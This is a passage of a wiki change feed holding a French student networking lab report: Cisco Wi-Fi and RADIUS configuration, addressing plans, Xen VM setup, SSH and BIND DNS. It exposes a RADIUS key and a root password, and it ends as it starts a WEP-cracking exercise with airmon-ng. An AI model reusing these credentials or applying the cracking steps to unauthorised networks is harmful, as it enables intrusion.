 radius-server host 193.48.57.177 auth-port 1812 acct-port 1813 key secret_marguerite&lt;br /&gt;
 aaa group server radius radius_marguerite&lt;br /&gt;
 server 193.48.57.177 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 dot11 ssid SSID_MARGUERITE&lt;br /&gt;
 vlan 11&lt;br /&gt;
  authentication open eap eap_marguerite&lt;br /&gt;
  authentication network-eap eap_marguerite&lt;br /&gt;
  authentication key-management wpa&lt;br /&gt;
  mbssid guest-mode&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Association du SSID à l'interface Wi-Fi :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 interface Dot11Radio0&lt;br /&gt;
  encryption vlan 5 mode ciphers aes-ccm tkip&lt;br /&gt;
  ssid SSID_MARGUERITE&lt;br /&gt;
  mbssid&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration du Vlan 11 :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 interface Dot11Radio0.11&lt;br /&gt;
  encapsulation dot1Q 11&lt;br /&gt;
  no ip route-cache&lt;br /&gt;
  bridge-group 11&lt;br /&gt;
  bridge-group 11 subscriber-loop-control&lt;br /&gt;
  bridge-group 11 spanning-disabled&lt;br /&gt;
  bridge-group 11 block-unknown-source&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration interface filaire :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet0.11&lt;br /&gt;
  encapsulation dot1Q 11&lt;br /&gt;
  bridge-group 11&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'IP du point d'accès et sa Gateway (n'est pas à faire par tous les groupes) :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
  ip default-gateway 10.1.0.2&lt;br /&gt;
  interface BVI 1&lt;br /&gt;
   ip address 10.1.0.4 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
'''Configuration du routeur en e304 :''' &lt;br /&gt;
&lt;br /&gt;
Configuration du VLAN1 :&lt;br /&gt;
  conf t&lt;br /&gt;
  interface vlan 1&lt;br /&gt;
   ip address 10.1.0.2 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Configuration du port sur lequel est branché l'AP en mode trunk : &lt;br /&gt;
&lt;br /&gt;
  conf t&lt;br /&gt;
  interface Gi4/2&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
   switchport trunk allowed vlan add 1&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Wiki_intrusion_5.5.zip&amp;diff=57164</id>
		<title>Fichier:Wiki intrusion 5.5.zip</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Wiki_intrusion_5.5.zip&amp;diff=57164"/>
				<updated>2021-12-16T10:07:00Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=57080</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=57080"/>
				<updated>2021-12-13T17:48:33Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 11 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces, en ajoutons la ligne suivante :&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''dns-nameservers 8.8.8.8 8.8.4.4'''&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
Puis nous avons vérifié son fonctionnement à l'aide d'un :&lt;br /&gt;
 ping www.google.com&lt;br /&gt;
 ...&lt;br /&gt;
 --- www.google.com ping statistics ---&lt;br /&gt;
 5 packets transmitted, 5 received, 0% packet loss, time 4005ms&lt;br /&gt;
&lt;br /&gt;
Configuration du SSH &lt;br /&gt;
&lt;br /&gt;
Dans /etc/ssh/sshd_config, ajout des lignes :&lt;br /&gt;
 Port 2223&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis :&lt;br /&gt;
 &amp;gt; systemctl restart ssh&lt;br /&gt;
 &amp;gt; systemctl status ssh&lt;br /&gt;
 ssh.service - OpenBSD Secure Shell server&lt;br /&gt;
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e&amp;gt;&lt;br /&gt;
     Active: active (running) since Mon 2021-11-29 14:47:49 UTC; 2s ago&lt;br /&gt;
       Docs: man:sshd(8)&lt;br /&gt;
             man:sshd_config(5)&lt;br /&gt;
    Process: 3679 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)&lt;br /&gt;
   Main PID: 3680 (sshd)&lt;br /&gt;
      Tasks: 1 (limit: 230)&lt;br /&gt;
     Memory: 1.3M&lt;br /&gt;
        CPU: 21ms&lt;br /&gt;
     CGroup: /system.slice/ssh.service&lt;br /&gt;
             `-3680 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups&lt;br /&gt;
&lt;br /&gt;
Puis nous testons le SSH depuis le terminal de la Zabeth :&lt;br /&gt;
 &amp;gt; ssh root@193.48.57.177 -p 2223&lt;br /&gt;
 password : glopglopglop&lt;br /&gt;
&lt;br /&gt;
Nous arrivons à nous connecter, la configuration du SSh est donc un succès.&lt;br /&gt;
&lt;br /&gt;
Configuration du DNS :&lt;br /&gt;
&lt;br /&gt;
On a installé le package bind9 :&lt;br /&gt;
 &amp;gt;apt install bind9&lt;br /&gt;
&lt;br /&gt;
Sur le site gandit.net, nous avons modifié : &lt;br /&gt;
&lt;br /&gt;
Fenêtre Glue Records : ns1.paixdieu.site | 193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Fenêtre Serveurs de noms :&lt;br /&gt;
&lt;br /&gt;
DNS Primaire : ns1.paixdieu.site | DNS Secondaire : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/resolv.conf, ajout de la ligne :&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
Afin de configurer le DNS par defaut.&lt;br /&gt;
&lt;br /&gt;
Puis nous passons à la configuration du DNS primaire :&lt;br /&gt;
On ajoute donc une zone lié à notre domaine paixdieu.site de type master et le chemin de son fichier de configuration et on permet les transferts d'informations avec le DNS secondaire ns6.gandi.net.&lt;br /&gt;
&lt;br /&gt;
On ajoute donc les lignes suivantes dans /etc/bind/named.conf.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/named.conf.site&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   193.48.57.0/24 ;&lt;br /&gt;
 };&lt;br /&gt;
 &lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.paixdieu.site&amp;quot;;&lt;br /&gt;
         allow-transfer {217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous configurons la zone paixdieu.site, pour cela on ajoute les ns.&lt;br /&gt;
On ajoute les lignes suivantes dans /etc/bind/db.paixdieu.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/db.paixdieu.site&lt;br /&gt;
 @       IN      SOA     ns1.paixdieu.site. postmaster.paixdieu.site. (&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.paixdieu.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.177&lt;br /&gt;
 www     IN      A       193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Pour tester le bon fonctionnement du serveur DNS, nous utilisons la commande :&lt;br /&gt;
&lt;br /&gt;
 &amp;gt;host -t any paixdieu.site localhost&lt;br /&gt;
&lt;br /&gt;
Résultat, cela fonctionne bien :&lt;br /&gt;
&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: localhost&lt;br /&gt;
 Address: 127.0.0.1#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 paixdieu.site has SOA record ns1.paixdieu.site. postmaster.paixdieu.site. 4 604800 86400 2419200 604800&lt;br /&gt;
 paixdieu.site name server ns6.gandi.net.&lt;br /&gt;
 paixdieu.site name server ns1.paixdieu.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite procéder à la création des certificats SSL.&lt;br /&gt;
Nous sommes donc aller sur Gandi, acheter un certificat.&lt;br /&gt;
Pour cela nous avons généré un CSR avec la commande :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout paixdieu.site.key -out paixdieu.site.csr&lt;br /&gt;
&lt;br /&gt;
-newkey tsa:2048 permet de générer une requête CSR et une clé privée utilisant le chiffrement RSA sur 2048 bits.&lt;br /&gt;
&lt;br /&gt;
-keyout paixdieu.site.key permet de sauvegarder le fichier de clé privée sous le nom &amp;quot;paixdieu.site.key&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
-out paixdieu.csr permet de sauvegarder le fichier CSR sous le nom &amp;quot;paixdieu.csr&amp;quot;. &lt;br /&gt;
&lt;br /&gt;
Lors du paramètrage, nous avons bien fait attention à rentrer &amp;quot;paixdieu.site&amp;quot; comme common name pour que le certificat soit validé par gandi.&lt;br /&gt;
Cela se fait en copant le contenu de paixdieu.site.csr dans la fenêtre correspondante lors de l'achat du certificat.&lt;br /&gt;
&lt;br /&gt;
Afin de bien sauvegarder les fichiers utilisés, nous les avvons sauvegarder dans le dossier suivant:&lt;br /&gt;
 ~/save_dns/paixdieu.site.csr&lt;br /&gt;
 ~/save_dns/paixdieu.site.key&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
